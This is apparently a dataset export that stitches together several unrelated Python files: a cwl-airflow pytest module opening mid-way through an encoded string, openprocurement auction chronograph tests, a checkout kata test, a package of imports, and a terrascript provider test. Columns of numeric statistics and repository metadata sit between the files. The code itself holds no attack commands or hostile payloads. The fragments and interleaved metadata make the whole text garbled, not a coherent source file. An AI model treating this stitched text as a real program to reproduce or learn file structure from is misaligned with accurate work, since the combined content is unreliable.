UStWFRvhgaMxB5B3kzpLx5ETYqj3SE7qXVO3cPDh6EDaxjAK41Afdu4x97giUaW7zDdcOm\
AwlVoZU//eP+zbv7t2/du31vfudgby/MIXTLXPcjhlyfdvalDVfWu2Ael8gTj7f7PxzsdS\
JxLnXCJS7ZgmPvGnc7cwKZK9hElWpTBKjf8QPRv/TkoZRg8gvfEx2XZa00ar/4r1pDdrB3\
YIHjy4RhmQSpEprHZRQDWCNaRW1ov0K6OEj2u3ZS8CaKsHQIGd4mIZ1elALZic6DyC85rV\
J6Nm5FTYfN5CmyXiZok4rM+4DGljn+P5jfu3P/3vz2/Qf30ZXtv23b0iUY1hksaM4yMRgi\
qR3XbY9FXA4aHBud4ogzHDuZLXQtSXB6/mQ3m/HZbyxHb9zSD0i3gt4VW/oWZdkYhdOS0q\
6bmBjWR9+IkKLm7YvY0/DB0N04M+ARUVbSz9R4Qii27JqdJdoLaKnucE5VA6QsAlxhHM2K\
fK1FxjDvrKApLKlzUo2Vlsow22A5xR7IORwXWsOYh7W+kW8La7hWIHHpm5YlK3DsLERe4E\
xaGaEN1gJG773vt5cTncsyYu9xC2MO5wLlR0rkJRtOtMt5o77qJl40BFHbdpN17eYS+z66\
5aXL30L18oLuibM3R+o3BajGM631Iw9FDNOw8wSyO3BFw/Fkw7sMpIxe9yWxKRTSSGw0jb\
ifvLxpU3Odj8nIwwx7zSt1narpMS5EN+VAyuneK/SnSgl6GtTbRVHRcXX5OmO+6NJE2ShC\
PGozW7FMqx2HcbJG8tBSHNXaQO4CMyzjYSwZFdayRNCbwsAYbWywZYsQ4uVUYeDZOmnXo9\
m3vwGItZCP"
)
]
)
def test_fast_cwl_load_workflow_from_compressed_cwl_should_fail(workflow):
pickle_folder = tempfile.mkdtemp()
workflow_path = os.path.join(DATA_FOLDER, *workflow)
with pytest.raises(AssertionError):
try:
workflow_tool = fast_cwl_load(
workflow=workflow,
cwl_args={"pickle_folder": pickle_folder}
)
except (FileNotFoundError, SchemaSaladException) as err:
assert False, \
f"Should raise because workflow didn't include runs or didn't exist. \n {err}"
finally:
shutil.rmtree(pickle_folder)
@pytest.mark.parametrize(
"inputs, target_id, controls",
[
# when target_id is not set
(
[
{
"type": "File",
"doc": "Input BAM file, sorted by coordinates",
"id": "file:///Users/tester/workflows/bam-bedgraph-bigwig.cwl#bam_file"
},
{
"type": ["null", "string"],
"doc": "Output filename for generated bedGraph",
"id": "file:///Users/tester/workflows/bam-bedgraph-bigwig.cwl#bedgraph_filename"
},
{
"type": ["null", "string"],
"doc": "Output filename for generated bigWig",
"id": "file:///Users/tester/workflows/bam-bedgraph-bigwig.cwl#bigwig_filename"
}
],
None,
[
(
"bam_file",
{
"type": "File",
"doc": "Input BAM file, sorted by coordinates",
"id": "file:///Users/tester/workflows/bam-bedgraph-bigwig.cwl#bam_file"
}
),
(
"bedgraph_filename",
{
"type": ["null", "string"],
"doc": "Output filename for generated bedGraph",
"id": "file:///Users/tester/workflows/bam-bedgraph-bigwig.cwl#bedgraph_filename"
}
),
( "bigwig_filename",
{
"type": ["null", "string"],
"doc": "Output filename for generated bigWig",
"id": "file:///Users/tester/workflows/bam-bedgraph-bigwig.cwl#bigwig_filename"
}
)
]
),
(
[
"file:///Users/tester/workflows/bam-bedgraph-bigwig.cwl#sorted_bedgraph_to_bigwig/bigwig_file",
"file:///Users/tester/workflows/bam-bedgraph-bigwig.cwl#sort_bedgraph/sorted_file"
],
None,
[
(
"sorted_bedgraph_to_bigwig/bigwig_file",
"file:///Users/tester/workflows/bam-bedgraph-bigwig.cwl#sorted_bedgraph_to_bigwig/bigwig_file"
),
(
"sort_bedgraph/sorted_file",
"file:///Users/tester/workflows/bam-bedgraph-bigwig.cwl#sort_bedgraph/sorted_file"
)
]
),
(
[
"file:///id/id/id/bam-bedgraph-bigwig.cwl#sorted_bedgraph_to_bigwig/bigwig_file",
"file:///id/id/id//bam-bedgraph-bigwig.cwl#sort_bedgraph/sorted_file"
],
None,
[
(
"sorted_bedgraph_to_bigwig/bigwig_file",
"file:///id/id/id/bam-bedgraph-bigwig.cwl#sorted_bedgraph_to_bigwig/bigwig_file",
),
(
"sort_bedgraph/sorted_file",
"file:///id/id/id//bam-bedgraph-bigwig.cwl#sort_bedgraph/sorted_file"
)
]
),
(
{
"file:///Users/tester/workflows/bam-bedgraph-bigwig.cwl#bam_file": {
"type": "File",
"doc": "Input BAM file, sorted by coordinates",
},
"file:///Users/tester/workflows/bam-bedgraph-bigwig.cwl#bedgraph_filename": {
"type": ["null", "string"],
"doc": "Output filename for generated bedGraph",
}
},
None,
[
(
"bam_file",
{
"type": "File",
"doc": "Input BAM file, sorted by coordinates"
}
),
(
"bedgraph_filename",
{
"type": ["null", "string"],
"doc": "Output filename for generated bedGraph"
}
)
]
),
(
[
[
"file:///Users/tester/workflows/bam-bedgraph-bigwig.cwl#sorted_bedgraph_to_bigwig/bigwig_file",
"file:///Users/tester/workflows/bam-bedgraph-bigwig.cwl#sort_bedgraph/sorted_file"
]
],
None,
[
(
[
"file:///Users/tester/workflows/bam-bedgraph-bigwig.cwl#sorted_bedgraph_to_bigwig/bigwig_file",
"file:///Users/tester/workflows/bam-bedgraph-bigwig.cwl#sort_bedgraph/sorted_file"
],
[
"file:///Users/tester/workflows/bam-bedgraph-bigwig.cwl#sorted_bedgraph_to_bigwig/bigwig_file",
"file:///Users/tester/workflows/bam-bedgraph-bigwig.cwl#sort_bedgraph/sorted_file"
]
)
]
),
(
10,
None,
[(10, 10)]
),
(
"file:///Users/kot4or/workspaces/airflow/cwl-airflow/tests/data/workflows/bam-bedgraph-bigwig.cwl#bigwig_filename",
None,
[
(
"bigwig_filename",
"file:///Users/kot4or/workspaces/airflow/cwl-airflow/tests/data/workflows/bam-bedgraph-bigwig.cwl#bigwig_filename"
)
]
),
(
[],
None,
[]
),
# when target_id is set
(
[
{
"type": "File",
"doc": "Input BAM file, sorted by coordinates",
"id": "file:///Users/tester/workflows/bam-bedgraph-bigwig.cwl#bam_file"
},
{
"type": ["null", "string"],
"doc": "Output filename for generated bedGraph",
"id": "file:///Users/tester/workflows/bam-bedgraph-bigwig.cwl#bedgraph_filename"
},
{
"type": ["null", "string"],
"doc": "Output filename for generated bigWig",
"id": "file:///Users/tester/workflows/bam-bedgraph-bigwig.cwl#bigwig_filename"
}
],
"bam_file",
[
(
"bam_file",
{
"type": "File",
"doc": "Input BAM file, sorted by coordinates",
"id": "file:///Users/tester/workflows/bam-bedgraph-bigwig.cwl#bam_file"
}
)
]
),
(
[
{
"type": "File",
"doc": "Input BAM file, sorted by coordinates",
"id": "file:///Users/tester/workflows/bam-bedgraph-bigwig.cwl#bam_file"
},
{
"type": ["null", "string"],
"doc": "Output filename for generated bedGraph",
"id": "file:///Users/tester/workflows/bam-bedgraph-bigwig.cwl#bedgraph_filename"
},
{
"type": ["null", "string"],
"doc": "Output filename for generated bigWig",
"id": "file:///Users/tester/workflows/bam-bedgraph-bigwig.cwl#bigwig_filename"
}
],
"file:///Users/tester/workflows/bam-bedgraph-bigwig.cwl#bam_file",
[
(
"bam_file",
{
"type": "File",
"doc": "Input BAM file, sorted by coordinates",
"id": "file:///Users/tester/workflows/bam-bedgraph-bigwig.cwl#bam_file"
}
)
]
),
(
[
{
"type": "File",
"doc": "Input BAM file, sorted by coordinates",
"id": "file:///Users/tester/workflows/bam-bedgraph-bigwig.cwl#bam_file"
},
{
"type": ["null", "string"],
"doc": "Output filename for generated bedGraph",
"id": "file:///Users/tester/workflows/bam-bedgraph-bigwig.cwl#bedgraph_filename"
},
{
"type": ["null", "string"],
"doc": "Output filename for generated bigWig",
"id": "file:///Users/tester/workflows/bam-bedgraph-bigwig.cwl#bigwig_filename"
}
],
"dummy",
[]
),
(
[
"file:///Users/tester/workflows/bam-bedgraph-bigwig.cwl#sorted_bedgraph_to_bigwig/bigwig_file",
"file:///Users/tester/workflows/bam-bedgraph-bigwig.cwl#sort_bedgraph/sorted_file"
],
"sort_bedgraph/sorted_file",
[
(
"sort_bedgraph/sorted_file",
"file:///Users/tester/workflows/bam-bedgraph-bigwig.cwl#sort_bedgraph/sorted_file"
)
]
),
(
[
"file:///Users/tester/workflows/bam-bedgraph-bigwig.cwl#sorted_bedgraph_to_bigwig/bigwig_file",
"file:///Users/tester/workflows/bam-bedgraph-bigwig.cwl#sort_bedgraph/sorted_file"
],
"file:///Users/tester/workflows/bam-bedgraph-bigwig.cwl#sort_bedgraph/sorted_file",
[
(
"sort_bedgraph/sorted_file",
"file:///Users/tester/workflows/bam-bedgraph-bigwig.cwl#sort_bedgraph/sorted_file"
)
]
),
(
[
"file:///Users/tester/workflows/bam-bedgraph-bigwig.cwl#sorted_bedgraph_to_bigwig/bigwig_file",
"file:///Users/tester/workflows/bam-bedgraph-bigwig.cwl#sort_bedgraph/sorted_file"
],
"dummy",
[]
),
(
{
"file:///Users/tester/workflows/bam-bedgraph-bigwig.cwl#bam_file": {
"type": "File",
"doc": "Input BAM file, sorted by coordinates",
},
"file:///Users/tester/workflows/bam-bedgraph-bigwig.cwl#bedgraph_filename": {
"type": ["null", "string"],
"doc": "Output filename for generated bedGraph",
}
},
"bedgraph_filename",
[
(
"bedgraph_filename",
{
"type": ["null", "string"],
"doc": "Output filename for generated bedGraph"
}
)
]
),
(
{
"file:///Users/tester/workflows/bam-bedgraph-bigwig.cwl#bam_file": {
"type": "File",
"doc": "Input BAM file, sorted by coordinates",
},
"file:///Users/tester/workflows/bam-bedgraph-bigwig.cwl#bedgraph_filename": {
"type": ["null", "string"],
"doc": "Output filename for generated bedGraph",
}
},
"file:///Users/tester/workflows/bam-bedgraph-bigwig.cwl#bedgraph_filename",
[
(
"bedgraph_filename",
{
"type": ["null", "string"],
"doc": "Output filename for generated bedGraph"
}
)
]
),
(
{
"file:///Users/tester/workflows/bam-bedgraph-bigwig.cwl#bam_file": {
"type": "File",
"doc": "Input BAM file, sorted by coordinates",
},
"file:///Users/tester/workflows/bam-bedgraph-bigwig.cwl#bedgraph_filename": {
"type": ["null", "string"],
"doc": "Output filename for generated bedGraph",
}
},
"dummy",
[]
),
(
[
[
"file:///Users/tester/workflows/bam-bedgraph-bigwig.cwl#sorted_bedgraph_to_bigwig/bigwig_file",
"file:///Users/tester/workflows/bam-bedgraph-bigwig.cwl#sort_bedgraph/sorted_file"
]
],
[
"file:///Users/tester/workflows/bam-bedgraph-bigwig.cwl#sorted_bedgraph_to_bigwig/bigwig_file",
"file:///Users/tester/workflows/bam-bedgraph-bigwig.cwl#sort_bedgraph/sorted_file"
],
[
(
[
"file:///Users/tester/workflows/bam-bedgraph-bigwig.cwl#sorted_bedgraph_to_bigwig/bigwig_file",
"file:///Users/tester/workflows/bam-bedgraph-bigwig.cwl#sort_bedgraph/sorted_file"
],
[
"file:///Users/tester/workflows/bam-bedgraph-bigwig.cwl#sorted_bedgraph_to_bigwig/bigwig_file",
"file:///Users/tester/workflows/bam-bedgraph-bigwig.cwl#sort_bedgraph/sorted_file"
]
)
]
),
(
[
[
"file:///Users/tester/workflows/bam-bedgraph-bigwig.cwl#sorted_bedgraph_to_bigwig/bigwig_file",
"file:///Users/tester/workflows/bam-bedgraph-bigwig.cwl#sort_bedgraph/sorted_file"
]
],
"anything that is not exactly the same as input",
[]
),
(
"file:///Users/kot4or/workspaces/airflow/cwl-airflow/tests/data/workflows/bam-bedgraph-bigwig.cwl#bigwig_filename",
"bigwig_filename",
[
(
"bigwig_filename",
"file:///Users/kot4or/workspaces/airflow/cwl-airflow/tests/data/workflows/bam-bedgraph-bigwig.cwl#bigwig_filename"
)
]
),
(
"file:///Users/kot4or/workspaces/airflow/cwl-airflow/tests/data/workflows/bam-bedgraph-bigwig.cwl#bigwig_filename",
"file:///Users/kot4or/workspaces/airflow/cwl-airflow/tests/data/workflows/bam-bedgraph-bigwig.cwl#bigwig_filename",
[
(
"bigwig_filename",
"file:///Users/kot4or/workspaces/airflow/cwl-airflow/tests/data/workflows/bam-bedgraph-bigwig.cwl#bigwig_filename"
)
]
),
(
"file:///Users/kot4or/workspaces/airflow/cwl-airflow/tests/data/workflows/bam-bedgraph-bigwig.cwl#bigwig_filename",
"dummy",
[]
),
(
10,
10,
[(10, 10)]
),
(
10,
12,
[]
),
(
[],
"dummy",
[]
)
]
)
def test_get_items(inputs, target_id, controls):
results = list(get_items(inputs, target_id))
assert results == controls
| 46.651509
| 173
| 0.651323
| 6,753
| 106,692
| 10.113875
| 0.10351
| 0.020454
| 0.031611
| 0.040352
| 0.945358
| 0.936588
| 0.929823
| 0.922078
| 0.913805
| 0.909062
| 0
| 0.096118
| 0.274013
| 106,692
| 2,286
| 174
| 46.671916
| 0.785649
| 0.070764
| 0
| 0.704177
| 0
| 0.007862
| 0.157639
| 0.104022
| 0
| 0
| 0
| 0
| 0.019656
| 1
| 0.013268
| false
| 0
| 0.00688
| 0
| 0.020147
| 0
| 0
| 0
| 1
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
ce378d72c5abaab1283b17e1f95cb21f133b005a
| 9,953
|
py
|
Python
|
openprocurement/auctions/swiftsure/tests/blanks/chronograph_blanks.py
|
bdmbdsm/openprocurement.auctions.swiftsure
|
f5b93555eb12212c69c8168f861376eae85f4648
|
[
"Apache-2.0"
] | null | null | null |
openprocurement/auctions/swiftsure/tests/blanks/chronograph_blanks.py
|
bdmbdsm/openprocurement.auctions.swiftsure
|
f5b93555eb12212c69c8168f861376eae85f4648
|
[
"Apache-2.0"
] | null | null | null |
openprocurement/auctions/swiftsure/tests/blanks/chronograph_blanks.py
|
bdmbdsm/openprocurement.auctions.swiftsure
|
f5b93555eb12212c69c8168f861376eae85f4648
|
[
"Apache-2.0"
] | null | null | null |
# -*- coding: utf-8 -*-
from openprocurement.auctions.core.utils import get_now
# AuctionSwitchQualificationResourceTest
def switch_to_qualification(self):
response = self.set_status('active.auction', {'status': self.initial_status})
self.app.authorization = ('Basic', ('chronograph', ''))
response = self.app.patch_json('/auctions/{}'.format(self.auction_id), {'data': {'id': self.auction_id}})
self.assertEqual(response.status, '200 OK')
self.assertEqual(response.content_type, 'application/json')
self.assertEqual(response.json['data']["status"], "active.qualification")
self.assertEqual(len(response.json['data']["awards"]), 1)
# AuctionAuctionPeriodResourceTest
def set_auction_period(self):
self.app.authorization = ('Basic', ('chronograph', ''))
response = self.app.patch_json('/auctions/{}'.format(self.auction_id), {'data': {'id': self.auction_id}})
self.assertEqual(response.status, '200 OK')
self.assertEqual(response.content_type, 'application/json')
self.assertEqual(response.json['data']["status"], 'active.tendering')
if self.initial_lots:
item = response.json['data']["lots"][0]
else:
item = response.json['data']
self.assertIn('auctionPeriod', item)
self.assertIn('shouldStartAfter', item['auctionPeriod'])
self.assertGreaterEqual(item['auctionPeriod']['shouldStartAfter'],
response.json['data']['tenderPeriod']['endDate'])
self.assertIn('T00:00:00+', item['auctionPeriod']['shouldStartAfter'])
self.assertEqual(response.json['data']['next_check'], response.json['data']['tenderPeriod']['endDate'])
if self.initial_lots:
response = self.app.patch_json('/auctions/{}'.format(self.auction_id), {
'data': {"lots": [{"auctionPeriod": {"startDate": "9999-01-01T00:00:00+00:00"}}]}})
item = response.json['data']["lots"][0]
else:
response = self.app.patch_json('/auctions/{}'.format(self.auction_id),
{'data': {"auctionPeriod": {"startDate": "9999-01-01T00:00:00+00:00"}}})
item = response.json['data']
self.assertEqual(response.status, '200 OK')
self.assertEqual(item['auctionPeriod']['startDate'], '9999-01-01T00:00:00+00:00')
if self.initial_lots:
response = self.app.patch_json('/auctions/{}'.format(self.auction_id),
{'data': {"lots": [{"auctionPeriod": {"startDate": None}}]}})
item = response.json['data']["lots"][0]
else:
response = self.app.patch_json('/auctions/{}'.format(self.auction_id),
{'data': {"auctionPeriod": {"startDate": None}}})
item = response.json['data']
self.assertEqual(response.status, '200 OK')
self.assertNotIn('startDate', item['auctionPeriod'])
def reset_auction_period(self):
self.app.authorization = ('Basic', ('chronograph', ''))
response = self.app.patch_json('/auctions/{}'.format(self.auction_id), {'data': {'id': self.auction_id}})
self.assertEqual(response.status, '200 OK')
self.assertEqual(response.content_type, 'application/json')
self.assertEqual(response.json['data']["status"], 'active.tendering')
if self.initial_lots:
item = response.json['data']["lots"][0]
else:
item = response.json['data']
self.assertIn('auctionPeriod', item)
self.assertIn('shouldStartAfter', item['auctionPeriod'])
self.assertGreaterEqual(item['auctionPeriod']['shouldStartAfter'], response.json['data']['tenderPeriod']['endDate'])
self.assertEqual(response.json['data']['next_check'], response.json['data']['tenderPeriod']['endDate'])
if self.initial_lots:
response = self.app.patch_json('/auctions/{}'.format(self.auction_id),
{'data': {"lots": [{"auctionPeriod": {"startDate": "9999-01-01T00:00:00"}}]}})
item = response.json['data']["lots"][0]
else:
response = self.app.patch_json('/auctions/{}'.format(self.auction_id),
{'data': {"auctionPeriod": {"startDate": "9999-01-01T00:00:00"}}})
item = response.json['data']
self.assertEqual(response.status, '200 OK')
self.assertGreaterEqual(item['auctionPeriod']['shouldStartAfter'], response.json['data']['tenderPeriod']['endDate'])
self.assertIn('9999-01-01T00:00:00', item['auctionPeriod']['startDate'])
self.set_status('active.auction', {'status': 'active.tendering'})
response = self.app.patch_json('/auctions/{}'.format(self.auction_id), {'data': {'id': self.auction_id}})
self.assertEqual(response.status, '200 OK')
self.assertEqual(response.json['data']["status"], 'active.auction')
item = response.json['data']["lots"][0] if self.initial_lots else response.json['data']
self.assertGreaterEqual(item['auctionPeriod']['shouldStartAfter'], response.json['data']['tenderPeriod']['endDate'])
if self.initial_lots:
response = self.app.patch_json('/auctions/{}'.format(self.auction_id),
{'data': {"lots": [{"auctionPeriod": {"startDate": "9999-01-01T00:00:00"}}]}})
item = response.json['data']["lots"][0]
else:
response = self.app.patch_json('/auctions/{}'.format(self.auction_id),
{'data': {"auctionPeriod": {"startDate": "9999-01-01T00:00:00"}}})
item = response.json['data']
self.assertEqual(response.status, '200 OK')
self.assertEqual(response.json['data']["status"], 'active.auction')
self.assertGreaterEqual(item['auctionPeriod']['shouldStartAfter'], response.json['data']['tenderPeriod']['endDate'])
self.assertIn('9999-01-01T00:00:00', item['auctionPeriod']['startDate'])
self.assertIn('9999-01-01T00:00:00', response.json['data']['next_check'])
now = get_now().isoformat()
auction = self.db.get(self.auction_id)
if self.initial_lots:
auction['lots'][0]['auctionPeriod']['startDate'] = now
else:
auction['auctionPeriod']['startDate'] = now
self.db.save(auction)
response = self.app.patch_json('/auctions/{}'.format(self.auction_id), {'data': {'id': self.auction_id}})
self.assertEqual(response.status, '200 OK')
self.assertEqual(response.json['data']["status"], 'active.auction')
item = response.json['data']["lots"][0] if self.initial_lots else response.json['data']
self.assertGreaterEqual(item['auctionPeriod']['shouldStartAfter'], response.json['data']['tenderPeriod']['endDate'])
self.assertGreater(response.json['data']['next_check'], item['auctionPeriod']['startDate'])
self.assertEqual(response.json['data']['next_check'], self.db.get(self.auction_id)['next_check'])
if self.initial_lots:
response = self.app.patch_json('/auctions/{}'.format(self.auction_id), {
'data': {"lots": [{"auctionPeriod": {"startDate": response.json['data']['tenderPeriod']['endDate']}}]}})
item = response.json['data']["lots"][0]
else:
response = self.app.patch_json('/auctions/{}'.format(self.auction_id), {
'data': {"auctionPeriod": {"startDate": response.json['data']['tenderPeriod']['endDate']}}})
item = response.json['data']
self.assertEqual(response.status, '200 OK')
self.assertEqual(response.json['data']["status"], 'active.auction')
self.assertGreaterEqual(item['auctionPeriod']['shouldStartAfter'], response.json['data']['tenderPeriod']['endDate'])
self.assertNotIn('9999-01-01T00:00:00', item['auctionPeriod']['startDate'])
self.assertGreater(response.json['data']['next_check'], response.json['data']['tenderPeriod']['endDate'])
auction = self.db.get(self.auction_id)
self.assertGreater(auction['next_check'], response.json['data']['tenderPeriod']['endDate'])
auction['tenderPeriod']['endDate'] = auction['tenderPeriod']['startDate']
if self.initial_lots:
auction['lots'][0]['auctionPeriod']['startDate'] = auction['tenderPeriod']['startDate']
else:
auction['auctionPeriod']['startDate'] = auction['tenderPeriod']['startDate']
self.db.save(auction)
response = self.app.patch_json('/auctions/{}'.format(self.auction_id), {'data': {'id': self.auction_id}})
if self.initial_lots:
item = response.json['data']["lots"][0]
else:
item = response.json['data']
self.assertGreaterEqual(item['auctionPeriod']['shouldStartAfter'], response.json['data']['tenderPeriod']['endDate'])
self.assertNotIn('next_check', response.json['data'])
self.assertNotIn('next_check', self.db.get(self.auction_id))
shouldStartAfter = item['auctionPeriod']['shouldStartAfter']
response = self.app.patch_json('/auctions/{}'.format(self.auction_id), {'data': {'id': self.auction_id}})
if self.initial_lots:
item = response.json['data']["lots"][0]
else:
item = response.json['data']
self.assertEqual(item['auctionPeriod']['shouldStartAfter'], shouldStartAfter)
self.assertNotIn('next_check', response.json['data'])
if self.initial_lots:
response = self.app.patch_json('/auctions/{}'.format(self.auction_id),
{'data': {"lots": [{"auctionPeriod": {"startDate": "9999-01-01T00:00:00"}}]}})
item = response.json['data']["lots"][0]
else:
response = self.app.patch_json('/auctions/{}'.format(self.auction_id),
{'data': {"auctionPeriod": {"startDate": "9999-01-01T00:00:00"}}})
item = response.json['data']
self.assertEqual(response.status, '200 OK')
self.assertEqual(response.json['data']["status"], 'active.auction')
self.assertGreaterEqual(item['auctionPeriod']['shouldStartAfter'], response.json['data']['tenderPeriod']['endDate'])
self.assertIn('9999-01-01T00:00:00', item['auctionPeriod']['startDate'])
self.assertIn('9999-01-01T00:00:00', response.json['data']['next_check'])
| 56.231638
| 120
| 0.643223
| 1,089
| 9,953
| 5.797062
| 0.064279
| 0.108348
| 0.144464
| 0.069697
| 0.899889
| 0.887534
| 0.876287
| 0.843656
| 0.824648
| 0.794868
| 0
| 0.033004
| 0.156737
| 9,953
| 176
| 121
| 56.551136
| 0.719171
| 0.009344
| 0
| 0.784314
| 0
| 0
| 0.27983
| 0.00761
| 0
| 0
| 0
| 0
| 0.359477
| 1
| 0.019608
| false
| 0
| 0.006536
| 0
| 0.026144
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
026ffeaa35e6366451926d8e71d9d46ea82fc598
| 2,211
|
py
|
Python
|
Checkout/test_checkout.py
|
locspoc/python-test-driven-development
|
adbd460b963d622695ec840250a8d22572e2c200
|
[
"MIT"
] | null | null | null |
Checkout/test_checkout.py
|
locspoc/python-test-driven-development
|
adbd460b963d622695ec840250a8d22572e2c200
|
[
"MIT"
] | null | null | null |
Checkout/test_checkout.py
|
locspoc/python-test-driven-development
|
adbd460b963d622695ec840250a8d22572e2c200
|
[
"MIT"
] | null | null | null |
# TO DO
# - Can create instance of Checkout class
# - Can add item price
# - Can calculate the current total
# - Can add multiple items and get correct total
# - Can add discount rules
# - Can apply discount rules to the total
# - Exception is thrown for item added without a price
# Checkout Kata Practice Session 28/5/2021
import pytest
from checkout import Checkout
@pytest.fixture()
def checkout():
checkout = Checkout()
checkout.addItemPrice("a", 1)
checkout.addItemPrice("b", 2)
return checkout
def test_CanCalculateTotal(checkout):
checkout.addItem("a")
assert checkout.calculateTotal() == 1
def test_GetCorrectTotalWithMultipleItems(checkout):
checkout.addItem("a")
checkout.addItem("b")
assert checkout.calculateTotal() == 3
def test_canAddDiscountRule(checkout):
checkout.addDiscount("a", 3, 2)
# @pytest.mark.skip
def test_canApplyDiscountRule(checkout):
checkout.addDiscount("a", 3, 2)
checkout.addItem("a")
checkout.addItem("a")
checkout.addItem("a")
assert checkout.calculateTotal() == 2
def test_ExceptionWithBadItem(checkout):
with pytest.raises(Exception):
checkout.addItem("c")
# def test_AssertTrue():
# assert True
# import pytest
# from checkout import Checkout
# @pytest.fixture()
# def checkout():
# checkout = Checkout()
# checkout.addItemPrice("a", 1)
# checkout.addItemPrice("b", 2)
# return checkout
# def test_CanCalculateTotal(checkout):
# checkout.addItem("a")
# assert checkout.calculateTotal() == 1
# def test_GetCorrectTotalWithMultipleItems(checkout):
# checkout.addItem("a")
# checkout.addItem("b")
# assert checkout.calculateTotal() == 3
# def test_canAddDiscountRule(checkout):
# checkout.addDiscount("a", 3, 2)
# def test_canApplyDiscountRule(checkout):
# checkout.addDiscount("a", 3, 2)
# # @pytest.mark.skip
# def test_canApplyDiscountRule(checkout):
# checkout.addDiscount("a", 3, 2)
# checkout.addItem("a")
# checkout.addItem("a")
# checkout.addItem("a")
# assert checkout.calculateTotal() == 2
# def test_ExceptionWithBadItem(checkout):
# with pytest.raises(Exception):
# checkout.addItem("c")
| 26.011765
| 54
| 0.695161
| 250
| 2,211
| 6.1
| 0.256
| 0.157377
| 0.104918
| 0.094426
| 0.824262
| 0.824262
| 0.824262
| 0.824262
| 0.824262
| 0.806557
| 0
| 0.01486
| 0.1782
| 2,211
| 85
| 55
| 26.011765
| 0.824436
| 0.578471
| 0
| 0.269231
| 0
| 0
| 0.01236
| 0
| 0
| 0
| 0
| 0
| 0.115385
| 1
| 0.230769
| false
| 0
| 0.076923
| 0
| 0.346154
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
5a02a4c1e7b6d236ad43a896e537235c9534901f
| 396
|
py
|
Python
|
pendulum_eqns/__init__.py
|
danhagen/NonlinearControl
|
3bda71a058ec3b1a598df886e9485fd4d08982ba
|
[
"MIT"
] | null | null | null |
pendulum_eqns/__init__.py
|
danhagen/NonlinearControl
|
3bda71a058ec3b1a598df886e9485fd4d08982ba
|
[
"MIT"
] | 5
|
2018-08-01T17:19:38.000Z
|
2020-08-18T19:57:46.000Z
|
pendulum_eqns/__init__.py
|
danhagen/NonlinearControl
|
3bda71a058ec3b1a598df886e9485fd4d08982ba
|
[
"MIT"
] | 1
|
2020-07-22T22:38:20.000Z
|
2020-07-22T22:38:20.000Z
|
from pendulum_eqns.physiology.muscle_params_BIC_TRI import *
from pendulum_eqns.physiology.musclutendon_equations import *
from pendulum_eqns.reference_trajectories._01 import *
from pendulum_eqns.integrator_backstepping_equations import *
from pendulum_eqns.state_equations import *
from pendulum_eqns.initial_tension import *
from pendulum_eqns.init_muscle_activation_controlled_model import *
| 49.5
| 67
| 0.886364
| 51
| 396
| 6.470588
| 0.45098
| 0.254545
| 0.339394
| 0.4
| 0.281818
| 0
| 0
| 0
| 0
| 0
| 0
| 0.005435
| 0.070707
| 396
| 7
| 68
| 56.571429
| 0.891304
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
5a227ecc833ca104a64f2be795ec3a31f1807a48
| 793
|
py
|
Python
|
tests/test_provider_nrkno_lastpass.py
|
mjuenema/python-terrascript
|
6d8bb0273a14bfeb8ff8e950fe36f97f7c6e7b1d
|
[
"BSD-2-Clause"
] | 507
|
2017-07-26T02:58:38.000Z
|
2022-01-21T12:35:13.000Z
|
tests/test_provider_nrkno_lastpass.py
|
mjuenema/python-terrascript
|
6d8bb0273a14bfeb8ff8e950fe36f97f7c6e7b1d
|
[
"BSD-2-Clause"
] | 135
|
2017-07-20T12:01:59.000Z
|
2021-10-04T22:25:40.000Z
|
tests/test_provider_nrkno_lastpass.py
|
mjuenema/python-terrascript
|
6d8bb0273a14bfeb8ff8e950fe36f97f7c6e7b1d
|
[
"BSD-2-Clause"
] | 81
|
2018-02-20T17:55:28.000Z
|
2022-01-31T07:08:40.000Z
|
# tests/test_provider_nrkno_lastpass.py
# Automatically generated by tools/makecode.py (24-Sep-2021 15:20:52 UTC)
def test_provider_import():
import terrascript.provider.nrkno.lastpass
def test_resource_import():
from terrascript.resource.nrkno.lastpass import lastpass_secret
def test_datasource_import():
from terrascript.data.nrkno.lastpass import lastpass_secret
# TODO: Shortcut imports without namespace for official and supported providers.
# TODO: This has to be moved into a required_providers block.
# def test_version_source():
#
# import terrascript.provider.nrkno.lastpass
#
# t = terrascript.provider.nrkno.lastpass.lastpass()
# s = str(t)
#
# assert 'https://github.com/nrkno/terraform-provider-lastpass' in s
# assert '0.5.3' in s
| 27.344828
| 80
| 0.752837
| 107
| 793
| 5.448598
| 0.551402
| 0.133791
| 0.144082
| 0.164666
| 0.243568
| 0
| 0
| 0
| 0
| 0
| 0
| 0.022321
| 0.152585
| 793
| 28
| 81
| 28.321429
| 0.845238
| 0.620429
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0.035714
| 0
| 1
| 0.5
| true
| 0.5
| 1
| 0
| 1.5
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 1
| 0
